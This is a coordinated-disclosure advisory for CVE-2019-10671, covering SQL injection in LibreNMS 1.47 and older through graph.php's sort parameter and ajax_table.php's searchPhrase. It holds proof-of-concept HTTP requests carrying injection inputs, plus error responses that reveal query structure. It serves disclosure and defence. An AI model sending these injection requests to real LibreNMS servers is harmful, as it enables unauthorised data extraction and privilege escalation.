LibreNMS Multiple SQL Injection Vulnerability

15 July 2019

 

CVE   

 

CVE-2019-10671

 

CVSS SCORE

 

8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)

 

XID

 

XL-19-025

 

AFFECTED VENDORS

 

LibreNMS (www.librenms.org)

 

CREDIT

 

Eldar Marcussen - xen1thLabs - Software Labs

 

VULNERABILITY SUMMARY       

 

 

LibreNMS does not parameterize all user supplied input within database queries, resulting in SQL injection vulnerabilities. An authenticated attacker can subvert these database queries to extract or manipulate data.

 

TECHNICAL DETAILS

     

 

An authenticated attacker can manipulate the database queries, typically to extract data, which can be used to elevate privileges.

 

PROOF OF CONCEPT  

 

http://host/graph.php?device=1&type=port_mac_acc_total&from=1553493874&to=1553515200& width=500&height=300&id=1&port=80&sort=union+select&stat=nuks

 

 

 

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)

Date: Tue, 26 Mar 2019 10:50:24 GMT

Content-Type: image/png

Connection: close

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 11987

 

SQL Error! SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'union select DESC LIMIT 0,10' at line 4 (SQL: SELECT *, (M.cipMacHCSwitchedBytes_input_rate + M.cipMacHCSwitchedBytes_output_rate) AS bps,

        (M.cipMacHCSwitchedPkts_input_rate + M.cipMacHCSwitchedPkts_output_rate) AS pps

        FROM `mac_accounting` AS M, `ports` AS I, `devices` AS D WHERE M.port_id = 1

        AND I.port_id = M.port_id AND D.device_id = I.device_id ORDER BY union select DESC LIMIT 0,10) (SQL: SELECT *, (M.cipMacHCSwitchedBytes_input_rate + M.cipMacHCSwitchedBytes_output_rate) AS bps,

        (M.cipMacHCSwitchedPkts_input_rate + M.cipMacHCSwitchedPkts_output_rate) AS pps

        FROM `mac_accounting` AS M, `ports` AS I, `devices` AS D WHERE M.port_id = 1

        AND I.port_id = M.port_id AND D.device_id = I.device_id ORDER BY union select DESC LIMIT 0,10)

  /opt/librenms/html/includes/graphs/port/mac_acc_total.inc.php:52

  /opt/librenms/html/includes/graphs/graph.inc.php:50

  /opt/librenms/html/graph.php:23

‰PNG

 

Figure 1 – SQL injection

 

POST /ajax_table.php HTTP/1.1

Host: 172.16.230.174

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://172.16.230.174/health/metric=toner/

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 74

Connection: close

Cookie: PHPSESSID=ierg32mbjb2i5n7ajcbtrr1j7f; XSRF-TOKEN=eyJpdiI6Ik9yY0F1bjZUS3VcLzZ2WitRXC81UEhDdz09IiwidmFsdWUiOiJ5Q1IrV1wvVXkzbW00dn RXRmJXc0daOXVGMENcL2llWk9vMXRXT2ZBMEtvajErVGhpTWdzXC81S3BUdys4bmoyQWxadVJRMVl LK1IzQjBaSEZZaFNKeFhaQT09IiwibWFjIjoiOGJhOGFiNzY1YWYzOGM4MDAyNzc5MmZjYzFmNzMzN2 VmYzg0OTlhNWIzNmM3ODk3ODMyOTQxN2RhYjQwM2RiNSJ9; librenms_session=eyJpdiI6InRzMVdmVjJWYm5wTmk1MTNGYllqT1E9PSIsInZhbHVlIjoibmd3ZGdyYit5S mJZdTBMR0ppajkzU1c3WmJ6anBoV3VNWW1LZWx4SFc5WktFM3pDRnVOcWErTDdwVkN5S1J6OFN6 VWV2QkZOcWZZVXVZR0Z2XC9lN3FRPT0iLCJtYWMiOiJkMjVjNzM3OGQ5ZjhmMzU0Y2U4NGEzOGRkM zc4YTBjZThmMTVjN2U2OWU2OGEyNGZhYTlhNDI3MTFjYjE1OThmIn0%3D

 

current=11&rowCount=50&searchPhrase=aaaa'&id=toner&view=detail&debug=1

 

 

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)

Date: Tue, 26 Mar 2019 11:32:24 GMT

Content-Type: application/json

Connection: close

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 915

 

SQL[SELECT COUNT(`toner_id`) FROM `toner` [1] 0.21ms]

SQL Error! SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%' OR `toner_descr` LIKE '%aaaa'%') ORDER BY `D`.`hostname`, `toner_descr` LIMIT' at line 1 (SQL: SELECT * FROM `toner` AS S, `devices` AS D WHERE S.device_id = D.device_id AND (`D`.`hostname` LIKE '%aaaa'%' OR `toner_descr` LIKE '%aaaa'%') ORDER BY `D`.`hostname`, `toner_descr` LIMIT 50,5) (SQL: SELECT * FROM `toner` AS S, `devices` AS D WHERE S.device_id = D.device_id AND (`D`.`hostname` LIKE '%aaaa'%' OR `toner_descr` LIKE '%aaaa'%') ORDER BY `D`.`hostname`, `toner_descr` LIMIT 50,5)

  /opt/librenms/html/includes/table/toner.inc.php:54

  /opt/librenms/html/ajax_table.php:44

{

    "current": 11,

    "rowCount": 5,

    "rows": [],

    "total": 0

}

 

AFFECTED SYSTEMS  

  

 

LibreNMS 1.47 and older

 

SOLUTION  

 

Upgrade to the latest version of LibreNMS

 

DISCLOSURE TIMELINE 

 

 

 

26/03/2019 - Contacted LibreNMS developer requesting disclosure coordination

28/03/2019 - Provided vulnerability details

16/04/2019 – Version 1.50.1 released which resolves this issue

15/07/2019 – xen1thLabs public disclosure